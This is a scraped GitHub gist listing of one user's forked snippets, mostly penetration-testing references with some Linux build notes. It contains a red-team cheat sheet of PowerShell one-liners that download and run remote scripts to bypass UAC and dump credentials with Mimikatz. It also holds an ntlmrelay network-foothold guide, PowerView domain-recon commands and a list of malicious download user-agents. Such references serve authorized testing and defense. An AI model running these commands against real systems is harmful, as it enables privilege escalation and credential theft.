Skip to content

Instantly share code, notes, and snippets.

:electron:
maybe!

EK_ jivoi

:electron:
maybe!
Block or report user

Report or block jivoi

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@jivoi
jivoi / pwn-o-magic.md
Created Jul 16, 2019 — forked from braimee/pwn-o-magic.md
Pwning internal networks automagically
View pwn-o-magic.md

Intro

This document pools several awesome tools and blog entries together (see "Resources" at the end of this doc) in an attempt to automate the process of getting an initial foothold on a network in a situation where you have no valid credentials.

Download and install ntlmrelay

Ok, so one weird thing I'm trying to figure out is if I install ntlmrelay as the first tool we'll use, these steps seem to work ok:

git clone https://github.com/CoreSecurity/impacket.git /opt/impacket
cd /opt/impacket
pip install .
View Native-Windows-Useragents-malicious.txt
//Invoke-WebRequest in Powershell - manually whitelist legit content first:
Mozilla/*WindowsPowerShell/*
System.Net.WebClient.DownloadFile():
None
//Start-BitsTransfer - manually whitelist legit content first:
Microsoft BITS/*
//certutil.exe - manually whitelist legit content first:
@jivoi
jivoi / AtomicTestsCommandLines.txt
Created Sep 5, 2018 — forked from caseysmithrc/AtomicTestsCommandLines.txt
Atomic Tests - All Command Lines - Replace Input Arguments #{input_argument} - More Soon
View AtomicTestsCommandLines.txt
_ _____ ___ __ __ ___ ____ ____ _____ ____ _____ _____ _ __ __
/ \|_ _/ _ \| \/ |_ _/ ___| | _ \| ____| _ \ |_ _| ____| / \ | \/ |
/ _ \ | || | | | |\/| || | | | |_) | _| | | | | | | | _| / _ \ | |\/| |
/ ___ \| || |_| | | | || | |___ | _ <| |___| |_| | | | | |___ / ___ \| | | |
/_/ \_\_| \___/|_| |_|___\____| |_| \_\_____|____/ |_| |_____/_/ \_\_| |_|
[********BEGIN TEST*******] Data Compressed T1002 has 3 Test(s)
View RedTeam_CheatSheet.ps1
# Description:
# Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.
# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"
# Invoke-Mimikatz: Dump credentials from memory
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"
# Import Mimikatz Module to run further commands
View update curl from source
sudo apt-get install checkinstall build-essential automake autoconf libtool pkg-config libcurl4-openssl-dev intltool libxml2-dev libgtk2.0-dev libnotify-dev libglib2.0-dev libevent-dev
wget https://curl.haxx.se/download/curl-7.60.0.tar.gz
tar xzf curl-7.60.0.tar.gz
./buildconf
./configure
checkinstall
dpkg -i /root/curl/curl-7.60.0/curl_7.60.0-1_amd64.deb
View ubuntu_18.04_mini_i3.md

Minimal i3 Ubuntu 18.04

TL,DR

A fully fonctional and good-looking linux for less than 256mb of ram

Setting Up

Downloading and installing

Get the "mini.iso" image from archive.ubuntu.com

Legacy boot

Just flash an usb drive with it as follow.

sudo dd bs=4M if=mini.iso of=/dev/sd<?> conv=fdatasync && sync
View gist:92b393ef168a8f5434bd7f4b527ab2b6
sudo apt-get install checkinstall build-essential automake autoconf libtool pkg-config libcurl4-openssl-dev intltool libxml2-dev libgtk2.0-dev libnotify-dev libglib2.0-dev libevent-dev
wget https://www.inet.no/dante/files/dante-1.4.2.tar.gz
./configure
make
sudo checkinstall
sudo dpkg -i dante_1.4.2-1_amd64.deb
# /etc/sockd.conf
# logoutput: syslog
@jivoi
jivoi / PowerView-2.0-tricks.ps1
Created Mar 10, 2018 — forked from HarmJ0y/PowerView-2.0-tricks.ps1
PowerView-2.0 tips and tricks
View PowerView-2.0-tricks.ps1
# NOTE: the most updated version of PowerView (http://www.harmj0y.net/blog/powershell/make-powerview-great-again/)
# has an updated tricks Gist at https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993
# get all the groups a user is effectively a member of, 'recursing up'
Get-NetGroup -UserName <USER>
# get all the effective members of a group, 'recursing down'
Get-NetGroupMember -GoupName <GROUP> -Recurse
# get the effective set of users who can administer a server
View burpsettings.json
{
"project_options":{
"connections":{
"hostname_resolution":[],
"out_of_scope_requests":{
"drop_all_out_of_scope":false,
"exclude":[
{
"enabled":true,
"file":"logout",
@jivoi
jivoi / autoburp.sh
Created Mar 9, 2018 — forked from jgamblin/autoburp.sh
Automatic Burp Script With Slack Reporting.
View autoburp.sh
#!/bin/sh
java -jar -Xmx2g -Djava.awt.headless=true ~/BurpSuitePro/burpsuite_pro.jar http jerrygamblin.com 80
cp *.html ~/BurpSuitePro/scan.html
wkhtmltopdf scan.html scan.pdf
curl -F file=@scan.pdf -F initial_comment="BurpProxy JerryGamblin.com Scan" -F channels=#burpreports -F token=(Your Token) https://slack.com/api/files.upload
rm *.html
rm *.pdf
You can’t perform that action at this time.